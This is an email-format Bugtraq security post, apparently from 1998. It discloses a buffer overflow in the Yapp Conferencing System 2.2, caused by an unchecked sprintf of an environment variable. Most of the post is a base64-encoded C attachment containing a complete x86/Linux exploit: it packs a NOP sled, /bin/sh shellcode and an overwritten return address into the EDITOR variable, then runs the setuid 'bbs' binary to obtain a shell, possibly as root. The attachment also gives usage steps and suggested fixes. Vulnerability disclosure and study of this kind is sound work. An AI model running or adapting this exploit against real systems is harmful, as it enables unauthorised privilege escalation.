--Boundary_(ID_5BV8Ud5bzpC/NCsdKCDDwg)
Content-type: TEXT/PLAIN; charset=US-ASCII
This is my first Bugtraq post, hope I'm doing this right...
The Yapp Conferencing System Version 2.2 (and others?) has an exploitable
buffer overrun in it's macro processing code. On line 215 of macro.c, we
see:
sprintf(buff,"%s=%s",name,value);
The variable "value" is taken from the environment and is never checked to
ensure that it's length does not exceed the ammount of space remaining in
the buffer after "NAME=" has been inserted. It is trivial to overflow
"buff" by defining "NAME" in the environment to contain a string longer
then the size of "buff" (512 characters) minus the length of "NAME=". I
have included an exploit which I wrote for Intel 80x86/Linux, it uses the
variable "EDITOR" (which I selected compeletely at random). This bug is
most like not going to have serious security implications, since Yapp
hardly ever runs setuid root (in fact, the README suggests creating a
special user to run Yapp as), but I could see a situation where an
attacker gains access to the special Yapp uid, replaces the Yapp binary
with a trojan version, and then waits for root to run it. If you're
looking for a way to patch this hole, read the exploit source.
-------------------------------------------------------------------------------
--Boundary_(ID_5BV8Ud5bzpC/NCsdKCDDwg)
Content-id: <Pine.BSF.3.96.980120031401.1469B@freenet.nether.net>
Content-type: TEXT/PLAIN; name=yapp_exploit.c; charset=US-ASCII
Content-description:
Content-disposition: ATTACHMENT; FILENAME=yapp_exploit.c
Content-transfer-encoding: BASE64
LyoNCiAqIEV4cGxvaXQgZm9yICJZYXBwIENvbmZlcmVuY2luZyBTeXN0ZW0s
IFZlcnNpb24gMi4yIi4NCiAqIEJ5IERhdmUgQm93bWFuLCBmb3IgU2FuZHJh
LCBvbiBKYW51YXJ5IDEzIDE5OTguDQogKg0KICogRGVzY3JpcHRpb246DQog
Kg0KICogVGhlIFlhcHAgQ29uZmVyZW5jaW5nIFN5c3RlbSBjbGllbnQgaGFu
ZGxlcyBlbnZpcm9ubWVudCB2YXJpYWJsZXMNCiAqIHdpdGhvdXQgZG9pbmcg
Ym91bmRzIGNoZWNraW5nLCBhbGxvd2luZyBvbmUgdG8gb3ZlcmZsb3cgYSBi
dWZmZXIgDQogKiBpbiB0aGUgImJicyIgZXhlY3V0YWJsZSBvbnRvIHRoZSBz
dGFjay4gVXNpbmcgdGhpcyB0ZWNobmlxdWUsIGl0DQogKiBwb3NzaWJsZSB0
byBvYnRhaW4gYSBzaGVsbCBydW5uaW5nIGFzIHRoZSB1c2VyIHdoaWNoIFlh
cHAgaXMgc2V0dWlkDQogKiB0byAoaW4gc29tZSBjYXNlcywgcm9vdCkuDQog
Kg0KICogVXNhZ2U6DQogKg0KICogYmFzaCQgZ2NjIC1vIHlhcHBfZXhwbG9p
dCB5YXBwX2V4cGxvaXQuYw0KICogYmFzaCQgLi95YXBwX2V4cGxvaXQNCiAq
IGJhc2gjDQogKg0KICogWW91J2xsIGhhdmUgdG8gY2hhbmdlIHRoZSBkZWZp
bml0aW9uIG9mICJCQlNfUFJPR1JBTSIgaW4gdGhlIHNvdXJjZS4gWW91DQog
KiBtYXkgYWxzbyBuZWVkIHRvIGFsdGVyIHRoZSBvZmZzZXQsIGJ1dCAtMTAw
MCB3b3JrZWQgZm9yIG1lLg0KICoNCiAqIFRlbXBvcmFyeSBmaXg6DQogKg0K
ICogYmFzaCMgY2htb2QgdS1zIC91c3IvbG9jYWwvYmluL2Jicw0KICoNCiAq
IExvbmcgdGVybSBmaXg6DQogKg0KICogRWl0aGVyIGNoYW5nZSB0aGUgc3By
aW50ZiAoMykgY2FsbCBvbiBsaW5lIDIxNSBvZiBtYWNyby5jIHRvIHNvbWV0
aGluZw0KICogd2hpY2ggY2hlY2tzIHRoZSBib3VuZHMgb2YgdGhlIGRhdGEg
aXQgY29waWVzLCBvciBzaW1wbHkgZm9yY2Ugc3RyaW5ncw0KICogcmVhZCBp
biBmcm9tIHRoZSBlbnZpcm9ubWVudCB0byBhIHNwZWNpZmljIGxlbmd0aCwg
aS5lLg0KICoNCiAqIGVudl9zdHJpbmcgWzUxMV0gPSAnXDAnOw0KICoNCiAq
IGlmIHlvdXIgYnVmZmVyIHdhcyA1MTIgY2hhcmFjdGVycyB3aWRlLiBQbGVh
c2Uga2VlcCBpbiBtaW5kIGhvd2V2ZXIsDQogKiBpbiB0ZXJtcyBvZiBzZWN1
cml0eSwgWWFwcCBpcyBhIF92ZXJ5XyBwb29ybHkgd3JpdGVuIHByb2dyYW0g
YW5kDQogKiBzaG91bGQgcHJvYmFibHkgbm90IHJ1biBzZXR1aWQgYW55b25l
LCBsZXQgYWxvbmUgcm9vdC4gSWYgeW91IGNhbg0KICogcG9zc2libHkgYXZv
aWQgaXQsIGRvbid0IHJ1biBZYXBwIHNldHVpZC4NCiAqDQogKiBBbmQgd2l0
aG91dCBmdXJ0aGVyIGFkby4uLg0KICoNCiAqLw0KDQojaWYgISBkZWZpbmVk
IChfX2kzODZfXykgfHwgISBkZWZpbmVkIChfX2xpbnV4X18pDQojZXJyb3Ig
SW50ZWwgODB4ODYvTGludXggcGxhdGZvcm0gcmVxdWlyZWQuDQojZW5kaWYN
Cg0KI2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0K
I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQoNCiNk
ZWZpbmUgQlVGRlNJWkUJNTEyIC0gc3RybGVuICgiRURJVE9SPSIpCS8qIFNp
emUgb2YgYnVmZmVyLiAqLw0KI2RlZmluZSBPRkZTRVQJCS0xMDAwCQkJCS8q
IE9mZnNldC4gKi8NCiNkZWZpbmUgQkJTX1BST0dSQU0JIi9ob21lL2RhdmUv
eWFwcC9iYnMiCQkvKiBQYXRoIHRvIHByb2dyYW0uICovDQoNCi8qIEZ1bmN0
aW9uIHdoaWNoIHJldHVybnMgdGhlIGJhc2UgYWRkcmVzcyBvZiB0aGUgc3Rh
Y2suICovDQpsb25nIGdldF9lc3AgKHZvaWQpDQp7DQoJX19hc21fXyAoIm1v
dmwgJWVzcCwgJWVheFxuIik7DQp9DQoNCi8qIE1hY2hpbmUgY29kZSBpbnN0
cnVjdGlvbnMgdG8gZXhlY3V0ZSAvYmluL3NoLCBJIGhhZCB0aGVtIGhlcmUg
aW4gKi8NCi8qIGdsb2JhbCBmb3IgYSByZWFzb24gYW5kIG5vdyBJIGp1c3Qg
ZG9uJ3QgZmVlbCBsaWtlIHBsYXlpbmcgd2l0aCAqLw0KLyogdGhlIHN0YWNr
IG9mZnNldCBhbnltb3JlLiAqLw0KdW5zaWduZWQgY2hhciBleGVjX3NoZWxs
IFtdID0NCiJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhc
eDQ2XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KIlx4ODlceGYzXHg4ZFx4
NGVceDA4XHg4ZFx4NTZceDBjXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4XHg0
MFx4Y2QiDQoiXHg4MFx4ZThceGRjXHhmZlx4ZmZceGZmL2Jpbi9zaCI7DQoN
Ci8qIE1haW4gZnVuY3Rpb24sIGR1aC4gKi8NCmludCBtYWluICh2b2lkKQ0K
ew0KCXVuc2lnbmVkIGNoYXIgYnVmZiBbNTE4XTsJCS8qIEJ1ZmZlciB0byBo
b2xkIG91ciBkYXRhLiAqLw0KCXVuc2lnbmVkIGNoYXIgKnB0cjsJCQkvKiBQ
b2ludGVyLiAqLw0KCWludCBjb3VudDsJCQkJLyogQ291bnRlci4gKi8NCgl1
bnNpZ25lZCBsb25nICphZGRyZXNzX3B0cjsJCS8qIExvbmcgcG9pbnRlci4g
Ki8NCg0KCS8qIEZpcnN0IHdlIGZpbGwgdGhlIGJ1ZmZlciB3aXRoIE5PUCBp
bnN0cnVjdGlvbnMuICovDQoJKHZvaWQpIG1lbXNldCAoYnVmZiwgMHg5MCwg
c2l6ZW9mIChidWZmKSk7DQoNCgkvKiBUaGVuIHdlIGNvcHkgb3VyIHNoZWxs
IGNvZGUgaW50byB0aGUgYnVmZmVyLiAqLw0KCXB0ciA9IGJ1ZmY7DQoJcHRy
ICs9IEJVRkZTSVpFIC0gc3RybGVuIChleGVjX3NoZWxsKTsNCglmb3IgKGNv
dW50ID0gMDsgY291bnQgPCBzdHJsZW4gKGV4ZWNfc2hlbGwpOyBjb3VudCsr
KQ0KCQkqcHRyKysgPSBleGVjX3NoZWxsIFtjb3VudF07DQoJDQoJLyogTm93
IHdlIGluc2VydCBvdXIgcmV0dXJuIGFkZHJlc3MgaW50byBlYnAgYW5kIGVp
cC4gKi8NCglhZGRyZXNzX3B0ciA9ICh1bnNpZ25lZCBsb25nICopICZidWZm
IFs1MDldOw0KCWZvciAoY291bnQgPSAwOyBjb3VudCA8IDI7IGNvdW50Kysp
DQoJCSphZGRyZXNzX3B0cisrID0gZ2V0X2VzcCAoKSArIE9GRlNFVDsNCgkN
CgkvKiBIZXJlIHdlIHRlcm1pbmF0ZSB0aGUgYnVmZmVyIGFzIGEgc3RyaW5n
Li4uICovDQoJcHRyID0gKHVuc2lnbmVkIGNoYXIgKikgYWRkcmVzc19wdHI7
DQoJKnB0ciA9ICdcMCc7DQoNCgkvKiBBbmQgYXR0ZW1wdCB0byBsb2FkIGl0
IGludG8gb3VyIGVudmlyb25tZW50LiAqLw0KCXVuc2V0ZW52ICgiRURJVE9S
Iik7DQoJaWYgKHNldGVudiAoIkVESVRPUiIsIGJ1ZmYsIDEpKSB7DQoJCXBl
cnJvciAoInNldGVudiIpOw0KCQlleGl0ICgxKTsNCgl9DQoNCgkvKiBGaW5h
bGx5LCB3ZSBleGVjdXRlIFlhcHAuICovDQoJKHZvaWQpIGV4ZWNsIChCQlNf
UFJPR1JBTSwgQkJTX1BST0dSQU0sIE5VTEwpOw0KCXBlcnJvciAoQkJTX1BS
T0dSQU0pOw0KCWV4aXQgKDEpOw0KfQ0K
--Boundary_(ID_5BV8Ud5bzpC/NCsdKCDDwg)--